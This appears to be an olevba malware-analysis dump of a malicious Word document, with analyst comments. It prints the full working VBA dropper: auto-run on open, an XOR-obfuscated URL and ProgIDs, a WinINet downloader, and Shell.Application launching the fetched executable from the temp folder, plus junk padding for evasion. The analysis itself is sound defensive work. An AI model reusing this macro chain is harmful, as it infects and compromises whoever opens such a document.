- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- nwncon~2.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: nwncon~2.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: nwncon~2.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Auto-execution entry point: Word runs AutoOpen as soon as the document
- ' is opened with macros enabled. Its only statement calls kdloosuu66
- ' (Module2), which carries out the whole download-and-execute chain.
- Sub autoopen()
- kdloosuu66
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module4.bas
- in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Module4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Module4: the string decoder (memak8of) plus two inert padding procedures.
- ' RIV3333gO is dead code: every GoTo targets the label on the very next
- ' line, so the procedure has no effect, and nothing on the live path
- ' (autoopen -> kdloosuu66) calls it. Presumably padding to dilute
- ' signature / heuristic detection.
- Private Sub RIV3333gO()
- GoTo wefwefwefweaafewf
- wefwefwefweaafewf:
- GoTo RERee33EGsssssgvfrgrg
- RERee33EGsssssgvfrgrg:
- GoTo EN299NEIKISKKKK7
- EN299NEIKISKKKK7:
- GoTo EN785NEIKISKKKK71
- EN785NEIKISKKKK71:
- GoTo ENNE435534IKISKKKK72
- ENNE435534IKISKKKK72:
- GoTo ULLL333LLAKhhwshefg
- ULLL333LLAKhhwshefg:
- End Sub
- ' Repeating-key XOR decoder used for every sensitive string in Module2
- ' (COM ProgIDs, drop filename, download URL).
- '   acascasc22 - key string (Module2 passes vjf788eS = "djnjdcjJJkmcakm").
- '   ghdhdhe8   - ciphertext as a hex string, two hex digits per byte.
- ' Returns the plaintext. Byte i (1-based) is XORed with the key character
- ' at position (i Mod Len(key)) + 1, i.e. the key is consumed starting from
- ' its SECOND character and wraps back to the first when i is a multiple of
- ' the key length. The decoded values are listed in the Module2 header.
- Public Function memak8of(acascasc22 As String, ghdhdhe8 As String) As String
- Dim asasas1 As Long
- Dim asasas1O As String
- Dim asasas10 As Integer
- ' Junk guard: the loop body runs exactly once with the counter at 0, so
- ' the condition is never true and End (terminate the macro) never fires.
- ' The same pattern appears twice more inside the decoding loop.
- Dim efefe332d As Integer
- For efefe332d = 0 To 0
- If efefe332d = 25 Then End
- Next efefe332d
- Dim asasas101 As Integer
- For asasas1 = 1 To (Len(ghdhdhe8) / 2)
- ' Parse the i-th hex pair into a byte value via Val("&H..").
- asasas10 = Val("&H" & (Mid$(ghdhdhe8, (2 * asasas1) - 1, 2)))
- ' Key byte for this position (see the key-indexing note above).
- asasas101 = Asc(Mid$(acascasc22, ((asasas1 Mod Len(acascasc22)) + 1), 1))
- Dim dwww343a As Integer
- For dwww343a = 0 To 0
- If dwww343a = 4 Then End
- Next dwww343a
- ' Append the decoded character; '+' acts as string concatenation here.
- asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
- Dim efe33q299 As Integer
- For efe33q299 = 0 To 0
- If efe33q299 = 4 Then End
- Next efe33q299
- Next asasas1
- memak8of = asasas1O
- End Function
- ' Inert padding, same GoTo-to-next-label pattern as RIV3333gO; never called.
- Private Sub IHYbeffeVuJC()
- GoTo asefawf3
- asefawf3:
- GoTo sgr467gfh
- sgr467gfh:
- GoTo d45854shfhfshf
- d45854shfhfshf:
- GoTo rhhrshrsth455
- rhhrshrsth455:
- GoTo uykoEuxdddd
- uykoEuxdddd:
- GoTo rVTBqKcccccArFPEEEEEyylmMVi
- rVTBqKcccccArFPEEEEEyylmMVi:
- GoTo IhzKeee2ascfacas2zw
- IhzKeee2ascfacas2zw:
- GoTo IhzKeee2svs2333zw
- IhzKeee2svs2333zw:
- GoTo IhzKeee223334css44zw
- IhzKeee223334css44zw:
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module11.bas
- in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Module11'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Module11: entirely inert padding. Every procedure below is either empty
- ' or a chain of GoTo statements each jumping to the label on the following
- ' line, so none of them does anything, and none is referenced from the
- ' live path (autoopen -> kdloosuu66 -> memak8of / HolDMdWA88). The module
- ' contains no string literals; olevba's "Hex Strings" hit for it is most
- ' likely triggered by the digit runs inside identifiers such as
- ' QlSkVaAo85668lfxu and UqD34343434rdEbaBjAm, not by encoded data.
- Private Sub RIVgO()
- GoTo myMuLxBcPMGZVtOntBESoqzJEi
- myMuLxBcPMGZVtOntBESoqzJEi:
- GoTo kDxnSccbgQJQvIHYbeuJCmUQrTZmwRfSEgCBd
- kDxnSccbgQJQvIHYbeuJCmUQrTZmwRfSEgCBd:
- GoTo NRsSeqnJfEwsDUkFsCaUyAhAG
- NRsSeqnJfEwsDUkFsCaUyAhAG:
- GoTo jstrwTahLZYosuLbSDlnHk
- jstrwTahLZYosuLbSDlnHk:
- GoTo zivUUwERtNsQiIuoGpMwG
- zivUUwERtNsQiIuoGpMwG:
- GoTo UlAHJSqlOQxDQfT
- UlAHJSqlOQxDQfT:
- End Sub
- Private Sub vuykqyOpo()
- GoTo NrVTBqKAr
- NrVTBqKAr:
- GoTo yylmMViKeIhzKzwqIFMQdZlBwyHfL
- yylmMViKeIhzKzwqIFMQdZlBwyHfL:
- GoTo msLTIokkjoZRZD
- msLTIokkjoZRZD:
- GoTo gjmeCgKuqfzqguEnn
- gjmeCgKuqfzqguEnn:
- GoTo oKQlSkVaAolfxuRnL
- oKQlSkVaAolfxuRnL:
- End Sub
- Public Function adrMOYidGVoIc()
- GoTo AzEpipThgwzCu
- AzEpipThgwzCu:
- GoTo bKtvPsx
- bKtvPsx:
- GoTo qDrdEbaBjAmqQqBvNLi
- qDrdEbaBjAmqQqBvNLi:
- GoTo UQctH
- UQctH:
- GoTo bytQYEZemcHQRPUsyF
- bytQYEZemcHQRPUsyF:
- GoTo wMPSKkyrcJLg
- wMPSKkyrcJLg:
- GoTo bYGTttUdqRmQpGhHS
- bYGTttUdqRmQpGhHS:
- End Function
- Public Function Nk3Tflh()
- GoTo irOJnpV
- irOJnpV:
- GoTo DsYTTRQIOVn
- DsYTTRQIOVn:
- GoTo dSVNmPusaOjZPeoQQ
- dSVNmPusaOjZPeoQQ:
- GoTo luGiChFYjYUOheBl
- luGiChFYjYUOheBl:
- GoTo xJabwyHfLpFms
- xJabwyHfLpFms:
- GoTo IokkjoZRZDePgjmeCgK
- IokkjoZRZDePgjmeCgK:
- GoTo fzqguEnnaM
- fzqguEnnaM:
- End Function
- Private Function QlSkVaAo85668lfxu()
- End Function
- Public Function Nad121112rMOYidGVoI6c()
- GoTo AzEpipThgwzCuibKtvPsxKUqDrdEbaBj
- AzEpipThgwzCuibKtvPsxKUqDrdEbaBj:
- GoTo qQqBvNLi
- qQqBvNLi:
- GoTo UQctHQbytQY
- UQctHQbytQY:
- GoTo GTttUdqRmQpGhHSMfNkT
- GTttUdqRmQpGhHSMfNkT:
- GoTo hsJZgirO
- hsJZgirO:
- End Function
- Public Function psvssqqqqqqY()
- GoTo PoePoePPP
- PoePoePPP:
- GoTo IokkjoKKLHHnaM
- IokkjoKKLHHnaM:
- GoTo QlSkVSsSMmnMxuRnLR
- QlSkVSsSMmnMxuRnLR:
- GoTo ssssscaaaa
- ssssscaaaa:
- GoTo GAAAAFFFFFc
- GAAAAFFFFFc:
- GoTo rA09181hgwzCuS
- rA09181hgwzCuS:
- GoTo KtvPs
- KtvPs:
- End Function
- Private Function UqD34343434rdEbaBjAm()
- End Function
- Private Function vNLigbrgrgRH8856H()
- End Function
- Public Sub tQY34cHQ()
- End Sub
- Public Function y5000S()
- GoTo cJLg6666sssssNbYGT
- cJLg6666sssssNbYGT:
- GoTo UdS334y5y5pGhHS
- UdS334y5y5pGhHS:
- GoTo NkTflaaAAa5555JZgirOJnpV
- NkTflaaAAa5555JZgirOJnpV:
- End Function
- Public Function DsYTTRQIO()
- End Function
- Public Function vssvsef3wtg3gxfvx()
- GoTo sdssssaas
- sdssssaas:
- GoTo sdvsS54738EG
- sdvsS54738EG:
- GoTo oZRZD44444eP
- oZRZD44444eP:
- GoTo meCvvvvvvgKuqf
- meCvvvvvvgKuqf:
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Module3: WinINet-based downloader. The four Declare statements bind
- ' wininet.dll exports under meaningless aliases so the real API names
- ' never appear as plain identifiers in the macro source:
- '   haggd867   = InternetCloseHandle
- '   majig892   = InternetOpenA
- '   ssdpOWW192 = InternetReadFile
- '   pqaLqqY64  = InternetOpenUrlA
- ' The #If VBA7 And Win64 branch supplies PtrSafe / LongPtr variants so
- ' the code loads under both 32-bit and 64-bit Office.
- Option Explicit
- #If VBA7 And Win64 Then
- Private Declare PtrSafe Function haggd867 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
- Private Declare PtrSafe Function majig892 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
- Private Declare PtrSafe Function ssdpOWW192 Lib "wininet.dll" Alias "InternetReadFile" (ByVal hFile As LongPtr, ByVal sBuff As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Private Declare PtrSafe Function pqaLqqY64 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
- #Else
- Private Declare Function haggd867 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
- Private Declare Function majig892 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
- Private Declare Function ssdpOWW192 Lib "wininet.dll" Alias "InternetReadFile" (ByVal hFile As Long, ByVal sBuff As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Private Declare Function pqaLqqY64 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
- #End If
- ' Size in bytes of the buffer handed to each InternetReadFile call.
- Private Const MBL = 8162
- ' User-Agent passed to InternetOpenA. An HTTP request from WINWORD.EXE
- ' carrying User-Agent "Mod1" is a usable network indicator.
- Private Const AAN As String = "Mod1"
- ' 1 = INTERNET_OPEN_TYPE_DIRECT: connect directly, ignoring proxy settings.
- Private Const IOTD = 1
- ' &H4000000 = INTERNET_FLAG_NO_CACHE_WRITE: do not leave a copy of the
- ' response in the WinINet cache.
- Private Const IFNCW = &H4000000
- ' Fetches sURL over WinINet and writes the raw response body to sFileName.
- '   sURL      - passed straight to InternetOpenUrlA; no validation.
- '   sFileName - destination path, opened For Binary and overwritten.
- ' Returns True when the URL handle was obtained, False when InternetOpenA
- ' or InternetOpenUrlA failed. No HTTP status, size or content check is
- ' performed: whatever the server returns is written to disk.
- Public Function HolDMdWA88(ByVal sURL As String, ByVal sFileName As String) As Boolean
- #If VBA7 And Win64 Then
- Dim hOpen As LongPtr, hFile As LongPtr
- #Else
- Dim hOpen As Long, hFile As Long
- #End If
- Dim Ret As Long
- ' sBuff is a fixed-length string of exactly MBL characters (see note below).
- Dim sBuff As String * MBL, sData As String
- Dim iFile As Integer, dData As Double
- ' Open a WinINet session: User-Agent "Mod1", direct connection, no proxy.
- hOpen = majig892(AAN, IOTD, vbNullString, vbNullString, 0)
- If hOpen = 0 Then
- Exit Function
- End If
- ' Issue the request with dwFlags = INTERNET_FLAG_NO_CACHE_WRITE.
- hFile = pqaLqqY64(hOpen, sURL, vbNullString, 0, IFNCW, 0)
- If hFile = 0 Then
- dData = 0
- Else
- ' First chunk: the entire fixed-length buffer is copied, not just the
- ' Ret bytes actually read. A first read shorter than MBL therefore
- ' leaves stale buffer contents in the output, and Len(sData) is MBL
- ' regardless of how many bytes arrived.
- ssdpOWW192 hFile, sBuff, MBL, Ret
- sData = sBuff
- ' Later chunks are truncated to Ret; the loop stops when a read reports
- ' 0 bytes. The InternetReadFile return value (failure flag) is ignored.
- Do While Ret <> 0
- ssdpOWW192 hFile, sBuff, MBL, Ret
- sData = sData + Mid(sBuff, 1, Ret)
- Loop
- ' Persist the buffered bytes to disk as a binary file.
- dData = Len(sData): iFile = FreeFile
- Open sFileName For Binary Access Write Lock Write As #iFile
- Put #iFile, , sData: Close #iFile
- End If
- ' InternetCloseHandle is called on hFile even when it is 0.
- haggd867 hFile
- haggd867 hOpen
- sData = ""
- ' Because of the fixed-length first copy, dData is non-zero whenever
- ' InternetOpenUrlA succeeded, so even a zero-byte body yields True.
- If dData Then
- HolDMdWA88 = True
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO UserForm1.frm
- in file: nwncon~2.doc - OLE stream: u'Macros/VBA/UserForm1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Module2: orchestration. The four hex constants are XOR-encrypted with
- ' the key in vjf788eS and decoded only at run time by memak8of (Module4).
- ' Applying that routine by hand to each constant gives:
- '   GRxvSG   -> "Shell.Application"
- '   jryj     -> "\Pikadlo64.exe"
- '   sdioph34 -> hxxp://deosiibude[.]de/deosiibude.de/js/bin.exe   (defanged)
- '   Mcdsef42 -> "Scripting.FileSystemObject"
- ' Net effect of kdloosuu66: download bin.exe to <temp folder>\Pikadlo64.exe
- ' and launch it through Shell.Application. This module has no Option
- ' Explicit, so EdEdE111, FSObject2, SSSS and SASASA are implicit Variants.
- Private Const GRxvSG = "39060F080F440B3A1B010A020A190D0500"
- Private Const jryj = "363E030F020E26255D594D041308"
- Private Const sdioph34 = "021A1E145945652E0E021008020F110E0B440006452E2F041E0A080918000F400E014C00396509040D4F0E1501"
- Private Const Mcdsef42 = "390D180D131E23240C432508070837131D1E010E2528200E0E17"
- ' XOR key shared by all four constants above.
- Private Const vjf788eS = "djnjdcjJJkmcakm"
- ' Called from autoopen (ThisDocument); performs the whole chain.
- Sub kdloosuu66()
- Dim FSOOO2
- ' Junk guard: the loop runs once with the counter at 0, so the condition
- ' is never true and End never executes. Repeated three more times below.
- Dim sder53dfbhRF As Integer
- For sder53dfbhRF = 0 To 0
- If sder53dfbhRF = 5 Then End
- Next sder53dfbhRF
- ' CreateObject("Scripting.FileSystemObject")
- Set FSOOO2 = CreateObject(memak8of(vjf788eS, Mcdsef42))
- Dim fffffF
- ' FSO SpecialFolder constant 2 = TemporaryFolder (the user's temp folder).
- Const fffffFID = 2
- Dim DdDd22A As Integer
- For DdDd22A = 0 To 0
- If DdDd22A = 5 Then End
- Next DdDd22A
- Set fffffF = FSOOO2.GetSpecialFolder(fffffFID)
- Dim Ee11 As Integer
- For Ee11 = 0 To 0
- If Ee11 = 5 Then End
- Next Ee11
- ' Drop path: <temp folder>\Pikadlo64.exe
- EdEdE111 = fffffF & memak8of(vjf788eS, jryj)
- Dim sil3489df As Integer
- For sil3489df = 0 To 0
- If sil3489df = 5 Then End
- Next sil3489df
- ' Second FileSystemObject instance, same ProgID as FSOOO2.
- Set FSObject2 = CreateObject(memak8of(vjf788eS, Mcdsef42))
- Dim seswwwsa As Integer
- For seswwwsa = 0 To 0
- If seswwwsa = 5 Then End
- Next seswwwsa
- ' Remove any earlier copy before re-downloading.
- If FSObject2.FileExists(EdEdE111) Then
- FSObject2.DeleteFile EdEdE111
- End If
- ' Download the payload via Module3. The Boolean result is tested but the
- ' If body is empty, so a failed download is not handled.
- If HolDMdWA88(memak8of(vjf788eS, sdioph34), EdEdE111) Then
- End If
- ' SSSS is never assigned anywhere; this statement has no effect.
- Set SSSS = Nothing
- ' Existence check with an empty body; no effect.
- If FSObject2.FileExists(EdEdE111) Then
- End If
- ' CreateObject("Shell.Application").Open on the dropped .exe path runs it
- ' (expected process chain: WINWORD.EXE -> Pikadlo64.exe).
- Set SASASA = CreateObject(memak8of(vjf788eS, GRxvSG))
- SASASA.Open EdEdE111
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module5.bas
- in file: nwncon~2.doc - OLE stream: u'Macros/VBA/Module5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Module5: a near-duplicate of Module11 with the identifiers re-salted
- ' with digit runs; entirely inert. Every procedure is either empty or a
- ' chain of GoTo statements each jumping to the label on the following
- ' line, so none does anything, and none is referenced from the live path
- ' (autoopen -> kdloosuu66 -> memak8of / HolDMdWA88). There are no string
- ' literals here; olevba's "Hex Strings" hit is most likely triggered by
- ' digit runs inside names such as UqD34343000000dEbaBjAm.
- Public Sub PkD4040Sccbg()
- End Sub
- Private Sub IHYbe505VuJC()
- GoTo TZmwR230fSEgCdKcNRsSeYqnJf
- TZmwR230fSEgCdKcNRsSeYqnJf:
- GoTo sDUk444FsCaUyA
- sDUk444FsCaUyA:
- GoTo GODjstrwT6904lnHkpCzivUUw
- GODjstrwT6904lnHkpCzivUUw:
- GoTo tNsQiIjuoGp873Tz
- tNsQiIjuoGp873Tz:
- GoTo uykqyO888855poEux
- uykqyO888855poEux:
- GoTo rVTBqKAr357FPyylmMVi
- rVTBqKAr357FPyylmMVi:
- GoTo IhzK4444zw
- IhzK4444zw:
- GoTo FdMQdZlB0258CYajGoQNTnvkPL
- FdMQdZlB0258CYajGoQNTnvkPL:
- GoTo PAtAfFrPpPpHKNFeHmVR
- PAtAfFrPpPpHKNFeHmVR:
- End Sub
- Private Sub RIV1541414gO()
- GoTo myMuLsaaaESoqzJEi
- myMuLsaaaESoqzJEi:
- GoTo kDxnScceeeeeCmUQrTZmwRfSEgCBd
- kDxnScceeeeeCmUQrTZmwRfSEgCBd:
- GoTo NRsSeqnaaaaaJfEwsDUkFsCaUyAhAG
- NRsSeqnaaaaaJfEwsDUkFsCaUyAhAG:
- GoTo jstrwT2352525ahLZYosuLbSDlnHk
- jstrwT2352525ahLZYosuLbSDlnHk:
- GoTo zivUUw44oGpMwG
- zivUUw44oGpMwG:
- GoTo UlAHJS444444qlOQxDQfT
- UlAHJS444444qlOQxDQfT:
- End Sub
- Private Sub vuyk111111qyOpo()
- GoTo NrV1010TBqKAr
- NrV1010TBqKAr:
- GoTo yylmMVi6464KeIhzKzwqIFMQdZlBwyHfL
- yylmMVi6464KeIhzKzwqIFMQdZlBwyHfL:
- GoTo msLTIok444kjoZRZD
- msLTIok444kjoZRZD:
- GoTo gjmeCgKu555qfzqguEnn
- gjmeCgKu555qfzqguEnn:
- GoTo oKQlSkVaA768olfxuRnL
- oKQlSkVaA768olfxuRnL:
- End Sub
- Public Function adrMOY7777idGVoIc()
- GoTo AzEpipThgwsdve4zCu
- AzEpipThgwsdve4zCu:
- GoTo bKtv4444Psx
- bKtv4444Psx:
- GoTo qDrdEbaBj534745674AmqQqBvNLi
- qDrdEbaBj534745674AmqQqBvNLi:
- GoTo UQct874H
- UQct874H:
- GoTo bytQYE0990099ZemcHQRPUsyF
- bytQYE0990099ZemcHQRPUsyF:
- GoTo wMPSKk333yrcJLg
- wMPSKk333yrcJLg:
- GoTo bYG23232TttUdqRmQpGhHS
- bYG23232TttUdqRmQpGhHS:
- End Function
- Public Function Nk3121212Tflh()
- GoTo irO5789JnpV
- irO5789JnpV:
- GoTo DsYTTR3333QIOVn
- DsYTTR3333QIOVn:
- GoTo dSVNmPusa565656OjZPeoQQ
- dSVNmPusa565656OjZPeoQQ:
- GoTo luGiChFYjYUO99999heBl
- luGiChFYjYUO99999heBl:
- GoTo xJabwyHfLpF66666ms
- xJabwyHfLpF66666ms:
- GoTo Io44kkjoZRZDePgj54meCgK
- Io44kkjoZRZDePgj54meCgK:
- GoTo fz343333222MMMaM
- fz343333222MMMaM:
- End Function
- Private Function QlSkGhHHGgglfxu()
- End Function
- Public Function psvssEEEqqqqqqY()
- GoTo PoeP001199PPP
- PoeP001199PPP:
- GoTo OPDK333339ja
- OPDK333339ja:
- GoTo JabwyU444444IOTYhFms
- JabwyU444444IOTYhFms:
- GoTo IokkjoKKLHH55555naM
- IokkjoKKLHH55555naM:
- GoTo QlSkVSsSM66666mnMxuRnLR
- QlSkVSsSM66666mnMxuRnLR:
- GoTo s77777sssscaaaa
- s77777sssscaaaa:
- GoTo GAAAAFFFFFc
- GAAAAFFFFFc:
- GoTo rA09181hg88888wzCuS
- rA09181hg88888wzCuS:
- GoTo KtvP999999s
- KtvP999999s:
- End Function
- Private Function UqD34343000000dEbaBjAm()
- End Function
- Private Function vNLigbrg1010108856H()
- End Function
- Public Sub tQY34212121cHQ()
- End Sub
- Public Function y5012121200S()
- GoTo cJLg666wewEEENbYGT
- cJLg666wewEEENbYGT:
- GoTo UdSWRRrrRRTT5y5pGhHS
- UdSWRRrrRRTT5y5pGhHS:
- GoTo NkTflaaAAaYyYyYyJnpV
- NkTflaaAAaYyYyYyJnpV:
- End Function
- Public Function DsYT3332222TRQIO()
- End Function
- Public Function vssvs234567gxfvx()
- GoTo sdsssNnNnsaas
- sdsssNnNnsaas:
- GoTo sdvsS5KkKk4738EG
- sdvsS5KkKk4738EG:
- GoTo oZRZD44UuUuUu444eP
- oZRZD44UuUuUu444eP:
- GoTo meCvvvvvvgKuqf
- meCvvvvvvgKuqf:
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+